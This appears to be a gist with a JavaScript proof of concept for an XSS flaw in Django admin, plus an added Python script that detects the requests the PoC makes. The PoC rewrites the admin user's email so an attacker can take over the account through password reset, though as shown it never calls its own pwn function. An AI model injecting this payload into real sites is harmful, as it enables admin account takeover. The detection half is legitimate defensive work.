Created Feb 15, 2017
#poc #django #js #vulnerability
/*
 * POC for XSS vulnerability
 *
 * Simply parse the change form for the admin user and change the email.
 * After this has run successfully, the attacker needs to reset the password
 * using the email indicated in the script.
 */
url = '/auth/user/1/change/'
url_reset_passwd = '/password_change/'
evil_email = ''

// get the values
function get_default(idx) {
    $element = $(this);
    attrname = $element.attr('name');
    value = $element.val();
    opts[attrname] = value;
}

// get the editing page
response = $.ajax(url, {
    success: function (data, testStatus, xhr){
    }
});

// this is called when the GET returns with success
function pwn(response) {
    $response = $(response)
    $form = $($response.find('form')[1])
    // fields for POSTing
    opts = {}
    // with a JQuery magic get the default value
    // i'm twelve, what's this?
    opts['email'] = evil_email;
    // ??? profit
    $.post(url, opts)
    console.log(' [+] pwned')
}
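
A server-side check for the request pattern this PoC produces, added here as an example and not part of the original gist: jQuery's `$.post` marks same-origin requests with `X-Requested-With: XMLHttpRequest`, and the request is issued from whatever page the injected script runs on rather than from the change form. It assumes a stock Django admin that submits change forms as ordinary form posts with a same-origin `Referer`; the request-record dict format and the sample data are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Admin user change-form path, e.g. /auth/user/1/change/ as used in the PoC.
CHANGE_URL = re.compile(r"^/(?:[\w-]+/)*auth/user/(\d+)/change/$")


def suspicious_admin_posts(requests):
    """Return (user_id, reasons) for POSTs to a user change form that do not
    look like a person submitting the admin form."""
    findings = []
    for req in requests:
        match = CHANGE_URL.match(req["path"])
        if req["method"] != "POST" or not match:
            continue
        headers = {k.lower(): v for k, v in req["headers"].items()}
        reasons = []
        # jQuery adds this header to same-origin $.ajax/$.post calls;
        # a regular browser form submit does not send it.
        if headers.get("x-requested-with", "").lower() == "xmlhttprequest":
            reasons.append("xhr-post")
        # A genuine submit originates from the change form itself, so the
        # Referer path equals the request path.
        if urlsplit(headers.get("referer", "")).path != req["path"]:
            reasons.append("referer-mismatch")
        if reasons:
            findings.append((int(match.group(1)), reasons))
    return findings


# Constructed sample records (hypothetical log format).
SAMPLE = [
    {"method": "GET", "path": "/auth/user/1/change/",
     "headers": {"X-Requested-With": "XMLHttpRequest",
                 "Referer": "https://example.test/comments/42/"}},
    {"method": "POST", "path": "/auth/user/1/change/",
     "headers": {"X-Requested-With": "XMLHttpRequest",
                 "Referer": "https://example.test/comments/42/"}},
    {"method": "POST", "path": "/auth/user/7/change/",
     "headers": {"Referer": "https://example.test/auth/user/7/change/"}},
]

if __name__ == "__main__":
    for user_id, reasons in suspicious_admin_posts(SAMPLE):
        print(f"user {user_id}: {', '.join(reasons)}")
```

Both signals are heuristics: a customised admin that saves via XHR would need the first check relaxed, and a strict `Referrer-Policy` that strips the header would trip the second.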